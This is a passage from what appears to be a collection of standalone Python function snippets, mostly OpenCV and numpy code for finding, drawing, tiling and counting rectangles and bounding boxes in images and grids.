the tested frame into the final arrays\"\"\"\n if(test == 1):\n recognisedBigFacesCenters.append(\n recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n \"\"\"Purging initial arrays of the tested values\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n return [recognisedBigFacesCenters, recognisedBigFacesCentersSizes, recognisedBigFacesPercentages]", "def get_rectangles_from_mask(img_arr):\n masks_point_dict = _get_mask_points(img_arr)\n mar_list = list()\n for object_id in masks_point_dict.keys():\n mask_points = masks_point_dict[object_id]\n mask_points = tuple(mask_points)\n hull_ordered = [mask_points[index] for index in ConvexHull(mask_points).vertices]\n hull_ordered.append(hull_ordered[0]) # making it cyclic, now first and last point are same\n\n # not a rectangle\n if len(hull_ordered) < 5:\n continue\n\n hull_ordered = tuple(hull_ordered)\n min_rectangle = _bounding_area(0, hull_ordered)\n for i in range(1, len(hull_ordered) - 1):\n rectangle = _bounding_area(i, hull_ordered)\n if rectangle['area'] < min_rectangle['area']:\n min_rectangle = rectangle\n\n min_rectangle['unit_vector_angle'] = atan2(min_rectangle['unit_vector'][1],\n min_rectangle['unit_vector'][0])\n\n min_rectangle['rectangle_center'] = _to_xy_coordinates(min_rectangle['unit_vector_angle'],\n min_rectangle['rectangle_center'])\n rect_corners = _rectangle_corners(min_rectangle)\n\n rect_corners = tuple(rect_corners)\n points_ordered = [rect_corners[index] for index in ConvexHull(rect_corners).vertices]\n mar_list.append(points_ordered)\n return mar_list", "def get_panels(rectangles):\n\n pairs = []\n for rect in rectangles:\n if (2 * rect[1][0] < rect[1][1]) or (rect[1][0] > 2 * rect[1][1]):\n if 2 * rect[1][0] < rect[1][1]:\n long_dim1 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim1 = 1\n\n box = cv2.boxPoints(rect)\n box2 = []\n min_angle = 10;\n for rect2 in rectangles:\n if 2 * rect[1][0] < rect[1][1]:\n long_dim2 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim2 = 1\n if (rect2 != rect) and (abs(rect[2] - rect2[2]) < min_angle) and (long_dim1 == 1 and long_dim2 == 1):\n box2 = cv2.boxPoints(rect2)\n min_angle = abs(rect[2] - rect2[2])\n\n if len(box2) != 0:\n box_pair = (box, box2)\n pairs.append(box_pair)\n\n return pairs", "def draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)", "def rectpolyctl(xmin,xmax,ymin,ymax):\n pc=[]\n pc.append((xmin,ymin))\n pc.append((xmin,ymax))\n pc.append((xmax,ymax))\n pc.append((xmax,ymin))\n pc.append((xmin,ymin))\n return pc", "def overlap_list_rect(list_rects):\n overlap = {}\n x_points = []\n y_points = []\n\n for rect in list_rects:\n x_points.append([rect['left_x'], rect['width']])\n y_points.append([rect['bottom_y'], rect['height']])\n\n x_overlap = find_overlap_range_list(x_points)\n\n y_overlap = find_overlap_range_list(y_points)\n\n if x_overlap and y_overlap:\n overlap['left_x'] = x_overlap[0]\n overlap['bottom_y'] = y_overlap[0]\n overlap['width'] = x_overlap[1]\n overlap['height'] = y_overlap[1]\n \n return overlap", "def crop_to_regions(img: np.ndarray, check_areas: List[Dict[str, List[int]]]) -> List[np.ndarray]:\n ret = []\n for region in check_areas:\n from_x = region['start'][0]\n from_y = region['start'][1]\n to_x = from_x + 
region['size'][0]\n to_y = from_y + region['size'][1]\n # Don't overflow\n to_x = to_x if to_x < img.shape[1] else img.shape[1] - 1\n to_y = to_y if to_y < img.shape[0] else img.shape[0] - 1\n ret.append(img[from_y:to_y, from_x:to_x])\n return ret", "def get_rectangles_mask(self, thresh: np.ndarray) -> np.ndarray:\r\n contours = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]\r\n mask = np.zeros(thresh.shape, np.uint8)\r\n good_contours = sorted(\r\n [cnt for cnt in contours if 100000 < cv.contourArea(cnt) < 200000],\r\n key=cv.contourArea,\r\n )\r\n\r\n setattr(self, \"contour1\", good_contours[0])\r\n setattr(\r\n self,\r\n \"contour2\",\r\n good_contours[1]\r\n if cv.pointPolygonTest(\r\n good_contours[1], tuple(good_contours[0][0][0]), False\r\n )\r\n < 0\r\n else good_contours[2],\r\n )\r\n\r\n cv.drawContours(mask, [self.contour1], 0, 255, -1)\r\n cv.drawContours(mask, [self.contour2], 0, 255, -1)\r\n\r\n return mask", "def __init_rect_list(self, ind, min_prob = 0.5):\n #bbox_label_pred = self.net.tops['bbox_label'].data[ind]\n #binary_pred = self.net.tops['binary_label'].data[ind]\n bottom_height = self.image_height\n bottom_width = self.image_width\n bbox_label_pred = self.net.tops['bbox_pred'].data[ind]\n binary_pred = self.net.tops['binary_softmax'].data[ind]\n label_pred = self.net.tops['label_softmax'].data[ind]\n \n (_, top_height, top_width) = bbox_label_pred.shape\n y_mul = bottom_height * 1. / top_height\n x_mul = bottom_width * 1. / top_width\n rect_list = []\n for y in xrange(top_height):\n for x in xrange(top_width):\n # corresponds to indices in original image\n cx_orig = x_mul * (x + 0.5)\n cy_orig = y_mul * (y + 0.5)\n\n # we predict a symbol here if p(no label) < x\n if binary_pred[0, y, x] < 0.5:\n k = np.argmax(label_pred[:, y, x]) \n #if label_pred[k, y, x] < 0.2: continue\n\n # apply offsets to get positions in original image\n cx = cx_orig + bbox_label_pred[0, y, x]\n cy = cy_orig + bbox_label_pred[1, y, x]\n w = bbox_label_pred[2, y, x]\n h = bbox_label_pred[3, y, x]\n xmin = cx - w / 2.0\n ymin = cy - h / 2.0\n rect = Rect(xmin, ymin, xmin + w, ymin + h, label=k, prob=label_pred[k, y, x])\n rect_list.append(rect)\n\n return rect_list", "def CV_rectangles(self,XYSP):\n X,Y,S,P = XYSP\n rectangles=[]\n for i in range(3):\n for j in range(3):\n rectangles.append([(X+i*S+i*P,Y+j*S+j*P),\\\n (X+i*S+i*P+S,Y+j*S+j*P+S)])\n return rectangles", "def recursive_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_rectangles(x, y)\n rects = _recursive_rectangles(x - dx, y - dy)\n # return set(map(lambda x: tuple(map(tuple, np.array(x) + (dx, dy))), rects))\n return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def cover_rect_with_circles(w, h, r):\n\n # initialize result list\n res = []\n\n # horizontal distance between circle centers\n x_dist = math.sqrt(3) * r\n # vertical distance between circle centers\n y_dist = 1.5 * r\n # number of circles per row (different for even/odd rows)\n cnt_x_even = math.ceil(w / x_dist)\n cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1\n # number of rows\n cnt_y = math.ceil((h - r) / y_dist) + 1\n\n y_offs = 0.5 * r\n for y in range(cnt_y):\n if y % 2 == 0:\n # shift even rows to the right\n x_offs = x_dist / 2\n cnt_x = cnt_x_even\n else:\n x_offs = 0\n cnt_x = cnt_x_odd\n\n for x in range(cnt_x):\n res.append((x_offs + x * x_dist, y_offs + y * y_dist))\n\n # top-right circle is not 
always required\n if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):\n res = res[0:-1]\n\n return res", "def draw_rects(in_img, rects, colour=(255, 0, 0)):\n img = convert_when_colour(colour, in_img.copy())\n thickness = int(max(img.shape) / 150)\n for rect in rects:\n img = cv2.rectangle(\n img,\n tuple(int(x) for x in rect[0]),\n tuple(int(x) for x in rect[1]),\n colour,\n thickness,\n )\n return img", "def find_rects_white(image: np.ndarray) -> List[np.ndarray]:\n\n raise NotImplementedError()\n\n #gray = norm_color_test(image.copy())\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray) # this numbers is hand picked guess from a few photos\n\n # split to HSV, then pick up rouhly any white color zeroing out the rest\n hsv = cv.cvtColor(image.copy(), cv.COLOR_RGB2HSV)\n h,s,v = cv.split(hsv)\n h[h<145] = 0\n h[h>165] = 0\n #h = cv.GaussianBlur(h, (5, 5), 0)\n normed = cv.normalize(h, None, 0, 255, cv.NORM_MINMAX, cv.CV_8UC1)\n kernel = cv.getStructuringElement(shape=cv.MORPH_ELLIPSE, ksize=(5,5))\n opened = cv.morphologyEx(normed, cv.MORPH_OPEN, kernel)\n\n # now find white regions contours\n whites = cv.findContours(opened, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)[0]\n whites.sort(key=cv.contourArea, reverse=True)\n whites = [cnt for cnt in whites if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n whiterects = []\n for i in whites:\n rect = cv.minAreaRect(i)\n w,h = rect[1]\n if w*h > 150: # 150px area, or rougly 12x12 pixels\n whiterects.append(rect)\n\n #cv.drawContours(image, whites, -1, COLORS[2 % len(COLORS)], 2)\n #cv.imshow('test', image)\n #cv.waitKey()\n\n whites = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), whiterects))\n\n\n\n #cv.imshow('test', edged)\n #cv.waitKey()\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n # filter non overlapping contours\n for i in reversed(range(len(boxes))):\n overlaps = False\n for wbox in whites:\n if wbox.overlaps(boxes[i]):\n overlaps = True\n break\n if not overlaps:\n boxes.pop(i)\n\n boxes = Rect.nms_merge(boxes)\n\n for i in range(len(contours)):\n #peri = cv.arcLength(contours[i], True)\n #approx = cv.approxPolyDP(contours[i], 0.02 * peri, True)\n rect = cv.minAreaRect(contours[i])\n box = cv.boxPoints(rect)\n box = np.int0(box)\n #cv.drawContours(image, [box], -1, COLORS[i % len(COLORS)], 2)\n #cv.putText(image, f'{i}: {cv.contourArea(contours[i])}px', (int(rect[0][0]), int(rect[0][1])), cv.FONT_HERSHEY_SIMPLEX, 0.6, COLORS[i % len(COLORS)], 1)\n\n #cv.drawContours(image, contours, -1, COLORS[1], 2)\n\n for b in boxes:\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmax), int(b.ymin)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymax)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmin), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmax), int(b.ymin)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n\n stacked = np.hstack( (cv.cvtColor(edged, cv.COLOR_GRAY2RGB), cv.cvtColor(opened, 
cv.COLOR_GRAY2RGB), image))\n cv.namedWindow('test', 0)\n cv.imshow('test', stacked)\n cv.waitKey()\n\n cv.imwrite('dump.jpg', stacked)\n\n\n return boxes or list()", "def _cells_for_rect(self, r):\n cells = set()\n cy = floor(r.y1 / self.cell_size)\n while (cy * self.cell_size) <= r.y2:\n cx = floor(r.x1 / self.cell_size)\n while (cx * self.cell_size) <= r.x2:\n cells.add((int(cx), int(cy)))\n cx += 1.0\n cy += 1.0\n return cells", "def draw_rects_on_img(img, rects):\n img_copy = img.copy()\n for rect in rects:\n x, y, w, h = rect\n cv2.rectangle(img_copy, (x,y), (x+w,y+h), (0,255,0), 2)\n return img_copy", "def list_square_inches(claim):\n return [(x, y)\n for x in range(claim['left'], claim['right'])\n for y in range(claim['top'], claim['bottom'])]", "def draw_rects(self, L, col):\n for (i, j) in L:\n self.draw_rect(i, j, col)", "def under_rect(self, rect):\n x_min = self.clampx((rect.left - self._origin.x) // self._cell_size[0])\n x_max = self.clampx((rect.right - self._origin.x) // self._cell_size[0])\n y_min = self.clampy((rect.top - self._origin.y) // self._cell_size[1])\n y_max = self.clampy((rect.bottom - self._origin.y) // self._cell_size[1])\n cells = []\n for ix in range(x_min, x_max + 1):\n for iy in range(y_min, y_max + 1):\n index = iy * self._cell_count[0] + ix\n cells.append(self._cells[index])\n return cells", "def get_random_rectangles(self):\n while len(self.rectangles) < self.n_rectangles:\n upper_left = [np.random.randint(0, 28) for i in range(2)] # upper-left corner coordinate\n lower_right = [np.random.randint(0, 28) for i in range(2)] # lower-right corner coordinate\n # Have upper left corner less than lower right corner of the rectangle\n if upper_left[0] < lower_right[0] and upper_left[1] < lower_right[1]:\n currentRect = Rectangle(upper_left, lower_right)\n currentArea = currentRect.area()\n # Only keep the rectangles whose area is 130 to 170\n if 130 <= currentArea <= 170:\n self.rectangles.append(currentRect)\n #print(\"Upper Left \", upper_left, \" Lower right \", lower_right, \" Area: \", currentRect.area())", "def _rectangles(m, n):\n return m * (m+1) * n * (n+1) // 4", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def cell_regions(\n x_len: float, y_len: float, factor: float = 2 / 3, buffer: float = 3.5\n) -> Tuple[List[List[float]], ...]:\n x_min, x_max = x_len / 2, -x_len / 2\n y_min, y_max = y_len / 2, -y_len / 2\n\n cell = [[x_min, x_max, x_max, x_min], [y_min, y_min, y_max, y_max]]\n\n liq = [\n [\n x_min * factor + buffer,\n x_max * factor - buffer,\n x_max * factor - buffer,\n x_min * factor + buffer,\n ],\n [\n y_min * factor + buffer,\n y_min * factor + buffer,\n y_max * factor - buffer,\n y_max * factor - buffer,\n ],\n ]\n\n crys = [\n [\n x_min * factor - buffer,\n x_max * factor + buffer,\n x_max * factor + buffer,\n x_min * factor - buffer,\n ],\n [\n y_min * factor - buffer,\n y_min * factor - buffer,\n y_max * factor + buffer,\n y_max * factor + buffer,\n ],\n ]\n\n return 
cell, liq, crys", "def get_boxes():\n boxes = []\n\n box_sizes = [256]\n left_x_cords = [x for x in range(0,1280,12)]\n top_y_cords = [y for y in range(360,720,12)]\n\n for box_size in box_sizes:\n for x_cord in left_x_cords:\n for y_cord in top_y_cords:\n if box_size+x_cord < 1280 and box_size+y_cord < 720:\n boxes.append([x_cord, y_cord, x_cord+box_size, y_cord+box_size])\n\n return boxes", "def build_list_of_champion_cards_rectangles(\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n Y_FIRST_CHAMPION_CARD_=Y_FIRST_CHAMPION_CARD,\n W_CHAMPION_CARD_=W_CHAMPION_CARD,\n H_CHAMPION_CARD_=H_CHAMPION_CARD,\n):\n logging.debug(\"Function build_list_of_champion_cards_rectangles() called\")\n\n cards_rectangles = [0] * CARDS_TO_BUY_AMOUNT_\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n top_left = (calculate_card_position_on_screen(i), Y_FIRST_CHAMPION_CARD_)\n bottom_right = (\n calculate_card_position_on_screen(i) + W_CHAMPION_CARD_,\n Y_FIRST_CHAMPION_CARD_ + H_CHAMPION_CARD_,\n )\n center = (\n top_left[0] + W_CHAMPION_CARD_ // 2,\n top_left[1] + H_CHAMPION_CARD_ // 2,\n )\n # print(\"Type\" ,type(center))\n cards_rectangles[i] = [top_left, bottom_right, center]\n\n logging.debug(\"Function build_list_of_champion_cards_rectangles() end\")\n return cards_rectangles", "def rectangleindices(self):\n return {r.n for r in self.rectangles}", "def _find_corners(self) -> list:\n width, height = self.width, self.height\n return [(0, 0), (width, 0), (0, height), (width, height)]", "def boundingRectPoints(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\tfirst = (x, y)\n\tend = (x+w, y+h)\n\treturn {\"top-left\": first, \"bottom-right\":end}", "def to_area(x, y, w, h, bottom_only=False):\n cover = []\n if bottom_only:\n for i in range(int(ceil(w))):\n cover.append((int(x)+i, int(y+ceil(h)-1)))\n else:\n for i in range(int(ceil(w))):\n for j in range(int(ceil(h))):\n cover.append((int(x)+i, int(y)+j))\n\n return cover", "def find_rect(self, data_3d):\n datax = [i[0] for i in data_3d]\n datay = [i[1] for i in data_3d]\n\n return min(datax), max(datax), min(datay), max(datay)", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height):\n \n full_image = numpy.ones((img_height, img_width), dtype=uint8)\n for x, y, width, height in exclude_zones:\n \n # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep\n exclusion = numpy.zeros((height, width), dtype=uint8)\n exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1)\n \n full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions)\n \n return full_image", "def get_pair_rects(contours):\n\n rect_pairs = []\n for index, cnt in enumerate(contours):\n # Rotated rect - ( center (x,y), (width, height), angle of rotation )\n rect = cv2.minAreaRect(cnt)\n center_x, center_y = rect[0]\n rect_angle = -round(rect[2], 2)\n\n if rect_angle > 45.0:\n # Iterate through all of the potential matches\n min_x_dist = min_rect = min_index = None\n for pot_index, pot_match in enumerate(contours):\n if np.array_equal(pot_match, cnt):\n continue\n\n match_rect = cv2.minAreaRect(pot_match)\n\n # Check if match is to the right of the contour\n if match_rect[0][0] > 
rect[0][0] and abs(\n match_rect[2] - rect_angle) > ANGLE_TOLERANCE_DEG:\n x_distance = match_rect[0][0] - rect[0][0]\n\n if min_x_dist is None or x_distance < min_x_dist:\n min_x_dist = x_distance\n min_rect = match_rect\n min_index = pot_index\n\n if min_rect is not None:\n rect_pairs.append((rect, min_rect))\n np.delete(contours, index)\n np.delete(contours, min_index)\n\n return rect_pairs", "def get_surroundings(matrix, coord):\n width = np.shape(matrix)[0]\n height = np.shape(matrix)[1]\n coordinates = []\n\n # top\n (\n coordinates.append((coord[0], coord[1] - 1))\n if coord[1] - 1 >= 0\n else None\n )\n # bottom\n (\n coordinates.append((coord[0], coord[1] + 1))\n if coord[1] + 1 < height\n else None\n )\n # left\n (\n coordinates.append((coord[0] - 1, coord[1]))\n if coord[0] - 1 >= 0\n else None\n )\n # right\n (\n coordinates.append((coord[0] + 1, coord[1]))\n if coord[0] + 1 < width\n else None\n )\n\n return coordinates", "def _recursive_encoded_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {encode_rectangle_to_int(((1, 1), (0, 0))), } # Must return a set\n if x == 1:\n return _recursive_encoded_rectangles(x, y-1) | set(encode_rectangle_to_int(((0, j), (x, y))) for j in range(y))\n if y == 1:\n return _recursive_encoded_rectangles(x-1, y) | set(encode_rectangle_to_int(((i, 0), (x, y))) for i in range(x))\n return _recursive_encoded_rectangles(x-1, y) | _recursive_encoded_rectangles(x, y-1) | \\\n set(encode_rectangle_to_int(((i, j), (x, y))) for i in range(x) for j in range(y))", "def recursive_encoded_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_encoded_rectangles(x, y)\n rects = _recursive_encoded_rectangles(x - dx, y - dy)\n func = partial(translate_encoded_rectangle, vector=(dx, dy))\n return set(map(func, rects))", "def get_background_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n background_coords = np.where((flattened == 0) | (flattened == 2))\n return background_coords", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def _get_tiles(self, width: Numeric) -> List[Polygon]:\n min_x, min_y, max_x, max_y = self._get_rounded_bounding_box(self.geom, width)\n tiles = []\n\n for i in range(0, int((max_x - min_x) / width)):\n for j in range(0, int((max_y - min_y) / width)):\n tile = box(\n (i * width) + min_x,\n (j * width) + min_y,\n ((i + 1) * width) + min_x,\n ((j + 1) * width) + min_y,\n )\n\n if self.geom.intersects(tile):\n tiles.append(tile)\n\n return tiles", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = 
con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def collision_test(rect, tiles):\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list", "def rectangles_in_cross_hatch(x_f, y_f):\n x0, y0 = 0, 0\n Q = np.matrix(((1, -1), (1, 1))) # Transformation matrix to cross-hatch coordinates (counter-clockwise)\n I = Q.I # Inverse transformation matrix back to grid coordinates\n y_prime_max = ((x0, y_f)*Q)[(0,1)] # Top-left of rectangle defines maximum y-value for cross-hatch coordinates\n y_prime_min = ((x_f, y0)*Q)[(0,1)] # Bottom-right defines minimum y-value\n x_prime_max = ((x_f, y_f)*Q)[(0,0)] # Top-right defines maximum x-value\n x_prime_min = 0 # Bottom-left corner remains at the origin\n x_prime_min += 1; y_prime_min += 1 # Add 1 because outer row of cross-hatch has no rectangles within the grid\n\n count = 0\n for x_prime in range(x_prime_min, x_prime_max):\n for y_prime in range(y_prime_min, y_prime_max):\n point = (x_prime, y_prime)*I\n x, y = point.A1 # .A1 flattens to allow easy assignment\n if x >= x0 and y >= y0: # Bottom corner is within bounds of grid\n for i in range(x_prime+1, x_prime_max):\n if ((i, y_prime)*I).A1[0] > x_f: break # Right corner out of grid; done with this x', y'\n for j in range(y_prime+1, y_prime_max):\n if ((x_prime, j)*I).A1[0] < x0: break # Left corner out of grid\n if ((i, j)*I).A1[1] > y_f: break # Top corner out of grid\n count += 1 # All 4 corners within bounds of grid\n return count", "def rect_union(class_list):\n if len(class_list) >= 1:\n rect_list = []\n for class_object in class_list:\n rect_list.append(class_object.rect)\n return rect_list[0].unionall(rect_list[1:])\n else:\n return Rect(0,0,0,0)", "def get_foreground_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n img = img * mask2[:,:,np.newaxis]\n # SHOW IMAGE\n # cv2.imshow(\"picture\",img)\n # cv2.waitKey(100)\n background_coords = np.where((flattened == 1) | (flattened == 3))\n # return (img , background_coords)\n ListBG = [len(background_coords[0])]\n ListBG.extend(list(background_coords[0]))\n return ListBG", "def recognize_pieces(edges, v, squares):\n\n pieces = []\n\n v = cv2.equalizeHist(v)\n for p1, p2 in squares:\n # count the number of slightly centered edges\n occupancy = sum(edges[y][x]\n for x in range(p1.x + 5, p2.x - 5)\n for y in range(p1.y + 5, p2.y - 5))\n\n if occupancy > 70*255:\n corners = (v[p1.y][p1.x], v[p1.y][p2.x],\n v[p2.y][p1.x], v[p2.y][p2.x])\n\n # average v-component of the corners\n avg = sum(map(float, corners)) / len(corners)\n\n # black pixels should be relatively black\n # when compared to the corner average\n black = sum(v[y][x] / avg < 0.2\n for x in range(p1.x, p2.x + 1)\n for y in range(p1.y, p2.y + 1))\n\n if black >= 1000 and black != 1049:\n color = \"B\"\n else:\n color = \"W\"\n\n pieces.append(color)\n else:\n pieces.append(None)\n\n return pieces", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = 
R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def brute_force_rectangles_in_grid(x, y):\n s = set(imap(lambda a: hasher(*a), combinations(grid(x, y), 2)))\n s.discard(0)\n return len(s)", "def extract_walls(img_array,x_scale,y_scale,wall_height):\n\n wall_th = 2\n length = 0\n wall_list = []\n\n #check for horizontal walls first\n for row in range(img_array.shape[0]):\n for col in range(img_array.shape[1]):\n \n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if left_edge(sec):\n #check two steps to the right\n next_sec = img_array.astype(int)[row:row+2, col+1:col+3]\n next_next_sec = img_array.astype(int)[row:row+2, col+2:col+4]\n\n #if horizontal wall, get coordinates and count length\n if is_wall(next_sec) and not right_edge(next_next_sec): \n #record corner coordinates\n x = col +1\n y = row\n while is_wall(next_sec):\n #start counting length across, until right edge found\n length +=1\n col +=1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list \n new_wall = Wall(x*x_scale,y*y_scale,length*x_scale,wall_th*y_scale,wall_height)\n wall_list.append(new_wall)\n length = 0\n\n #check for vertical walls\n for col in range(img_array.shape[1]):\n for row in range(img_array.shape[0]):\n\n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if top_edge(sec): \n #check two steps below\n next_sec = img_array.astype(int)[row+1:row+3, col:col+2]\n next_next_sec = img_array.astype(int)[row+2:row+4, col:col+2]\n\n #if vertical wall, get coordinates and count length\n if is_wall(next_sec) and is_wall(next_next_sec):\n x = col\n y = row\n while is_wall(next_sec):\n #start counting length downwards, until bottom edge found\n length += 1\n row += 1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list\n new_wall = Wall(x*x_scale,y*y_scale,wall_th*x_scale,length*y_scale, wall_height)\n wall_list.append(new_wall)\n length = 0\n\n return wall_list", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def Recursive_Rectangles(*args):\n if len(args) == 1 and isinstance(args[0], Rectangle):\n rectangle = args[0]\n else:\n rectangle = Rectangle(*args)\n dx, dy = rectangle.vertices[0]\n if (dx, dy) == (0, 0):\n return _Recursive_Rectangles(*rectangle.vertices[1])\n\n rects = _Recursive_Rectangles(*rectangle.translated(-dx, -dy).vertices[1])\n return set(r.translated(dx, dy) for r in 
